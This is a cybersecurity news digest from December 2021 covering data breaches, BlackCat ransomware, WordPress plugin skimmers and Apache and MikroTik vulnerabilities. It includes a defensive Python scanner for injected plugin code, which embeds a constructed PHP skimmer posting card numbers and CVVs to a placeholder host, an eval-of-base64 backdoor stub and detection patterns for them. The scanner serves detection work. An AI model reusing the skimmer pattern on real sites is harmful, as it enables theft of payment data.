
Cyware Daily Threat Intelligence, December 10, 2021


The cyber-arms race between cybercriminals and security teams continues with the discovery of new sneaky mechanisms used by attackers to bypass existing defenses. Among the new threats reported in the last 24 hours was the first Rust-based ransomware used in real-world attacks and a malware campaign by an infamous APT group distributing a keylogger through malicious installers.

In other news, the CISA warned of several Apache HTTP Server vulnerabilities that affect multiple Cisco enterprise products, whereas Mozilla patched high-severity vulnerabilities in its Firefox browser and Thunderbird mail client. Lastly, data breaches at a payroll solution provider and a food importer affected the personal information of thousands of employees.


Top Breaches Reported in the Last 24 Hours

Data breach at Cox Communications
The US-based telecommunications and digital cable provider Cox Communications suffered a data breach after a hacker impersonated its support agent to gain access to customers' personal information. The hacker may have accessed the details of some customers, including their names, addresses, telephone numbers, Cox account numbers, Cox.net email addresses, usernames, PIN codes, account security questions and answers, and the types of services they are subscribed to.

Government workers breached
Payroll solution provider Frontier Software was hit by a ransomware attack recently. During this incident, the attackers may have accessed the personal information of at least 38,000 and up to 80,000 government employees of the state of South Australia. The data included names, birthdates, tax file numbers, home addresses, bank account details, and other employment and payroll-related information.

Food importer hit by ransomware
North American food importer Atalanta Corporation disclosed a data breach following a ransomware attack that impacted its employees’ personal information. An investigation into the incident revealed that certain information related to Atalanta’s current and former employees and certain visitors was accessed during this incident.


Top Malware Reported in the Last 24 Hours

First Rust-based ransomware
A first-of-its-kind ransomware strain written in the Rust programming language was discovered this week. It is the first such ransomware to be used in attacks in the wild, as opposed to the experimental proofs of concept created in the past. The operators behind the ransomware, dubbed ALPHV (or BlackCat), are advertising it as a ransomware-as-a-service on two underground cybercrime forums, namely XSS and Exploit.

Malware-laced WordPress plugins
Sucuri researchers warned of credit card skimmers being injected into arbitrary plugins on e-commerce WordPress sites. Instead of injecting skimmers into the ‘wp-admin’ and ‘wp-includes’ core directories, threat actors are using plugin files to hide their malicious scripts or to inject a backdoor that keeps persistence even after the latest security updates have been installed.
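Because the injected code lives in plugin files rather than in core directories, the practical defence is an integrity baseline of wp-content/plugins taken after a clean install or update, with a content heuristic as a second signal. The following is an added example written for this briefing, not Sucuri's tooling or code from the article; the regular-expression heuristics, the "Hello Example" plugin, the skimmer fragment and the file name class-wp-cache.php are all constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics for PHP that rarely belongs in a plugin (an assumption of this
# example, not indicators published by the article or by Sucuri). They are
# noisy on their own; the integrity check below is the primary signal.
SUSPICIOUS_PATTERNS = {
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "long_base64_literal": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
    "payment_field_access": re.compile(
        r"(?:card[_-]?number|cvv2?|cvc|exp(?:iry|_month))", re.I),
    "outbound_http": re.compile(r"(?:curl_exec|curl_init|wp_remote_post)\s*\(", re.I),
}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(plugins_dir: Path) -> dict:
    """Hash every file under the plugins directory.

    Take this snapshot right after a clean install or update; a plugin update
    replaces the whole plugin tree, so the baseline is refreshed with it."""
    return {
        str(p.relative_to(plugins_dir)): sha256_of(p)
        for p in sorted(plugins_dir.rglob("*"))
        if p.is_file()
    }


def scan_plugins(plugins_dir: Path, baseline: dict) -> list:
    """Return (relative_path, reason) tuples for anything worth an analyst's look."""
    findings = []
    for p in sorted(plugins_dir.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(plugins_dir))
        # Integrity first: a file that was added or changed since the baseline
        # is exactly what a plugin-directory injection looks like.
        if rel not in baseline:
            findings.append((rel, "not_in_baseline"))
        elif baseline[rel] != sha256_of(p):
            findings.append((rel, "hash_mismatch"))
        # Content heuristics only for PHP files.
        if p.suffix == ".php":
            text = p.read_text(errors="replace")
            for name, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(text):
                    findings.append((rel, name))
    return findings


# Constructed sample plugin (not a real WordPress plugin).
CLEAN_PLUGIN = """<?php
/* Plugin Name: Hello Example (constructed sample) */
function hello_example_footer() { echo '<p>Hello</p>'; }
add_action('wp_footer', 'hello_example_footer');
"""

# Constructed skimmer-like tail: reads card fields and posts them to a
# non-routable placeholder host. Used only to exercise the scanner.
INJECTED_TAIL = """
function hx_collect() {
    $d = array('n' => $_POST['card_number'], 'c' => $_POST['cvv']);
    $ch = curl_init('https://EXAMPLE-EXFIL-HOST.invalid/c');
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));
    curl_exec($ch);
}
add_action('init', 'hx_collect');
"""

# Constructed "backdoor" shape: eval of a long base64 literal. The literal
# decodes to the harmless string "ABC" repeated, so the file does nothing.
BACKDOOR = "<?php eval(base64_decode('" + "QUJD" * 40 + "'));"


def demo() -> dict:
    """Baseline a clean tree, then simulate the injection and rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "wp-content" / "plugins"
        plugin_dir = plugins / "hello-example"
        plugin_dir.mkdir(parents=True)
        target = plugin_dir / "hello-example.php"
        target.write_text(CLEAN_PLUGIN)
        baseline = build_baseline(plugins)
        before = scan_plugins(plugins, baseline)

        # Simulated compromise: append to an existing plugin file and drop a
        # new file with a core-sounding name inside the plugin directory.
        target.write_text(CLEAN_PLUGIN + INJECTED_TAIL)
        (plugin_dir / "class-wp-cache.php").write_text(BACKDOOR)
        after = scan_plugins(plugins, baseline)
        return {"before": before, "after": after}


if __name__ == "__main__":
    for rel, reason in demo()["after"]:
        print(f"{reason:24s} {rel}")
```

In production the baseline would be stored off-host (or signed) so an attacker with write access to the web root cannot simply regenerate it, and the heuristic hits would be triaged rather than auto-quarantined, since legitimate payment-gateway plugins also touch card fields and make outbound requests.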

Malware campaign by StrongPity APT
The sophisticated StrongPity hacker group was found using malware-laced Notepad++ installers to infect their targets with a keylogger coupled with persistence capabilities. The group, also known as APT-C-41 and Promethium, was previously known for distributing trojanized WinRAR installers in highly-targeted campaigns between 2016 and 2018.


Top Vulnerabilities Reported in the Last 24 Hours

Apache HTTP Server vulnerabilities
The CISA released a second advisory about several Apache HTTP Server vulnerabilities. The five vulnerabilities, tracked as CVE-2021-33193, CVE-2021-34798, CVE-2021-36160, CVE-2021-39275, and CVE-2021-40438, affect Apache HTTP Server (httpd) 2.4.48 and earlier releases and impact multiple Cisco products used by enterprises worldwide.

MikroTik devices exposed to attacks
Researchers found MikroTik devices exposed to remote takeover attacks due to a set of unaddressed vulnerabilities. These include two high-severity flaws, tracked as CVE-2019-3977 and CVE-2019-3978, with CVSS scores of 7.5 each. The remaining two critical flaws enabling full takeover of devices are CVE-2018-14847 (CVSS score: 9.1) and CVE-2018-7445 (CVSS score: 9.8).

Mozilla releases security updates
Mozilla released security updates for the Firefox browser and the Thunderbird mail client to address multiple vulnerabilities, including several bugs rated high severity. The Firefox 95 version addresses 13 vulnerabilities, including six issues with high severity ratings. Some of the patches were also included in Firefox ESR 91.4 and Thunderbird 91.4.0.


Posted on: December 10, 2021
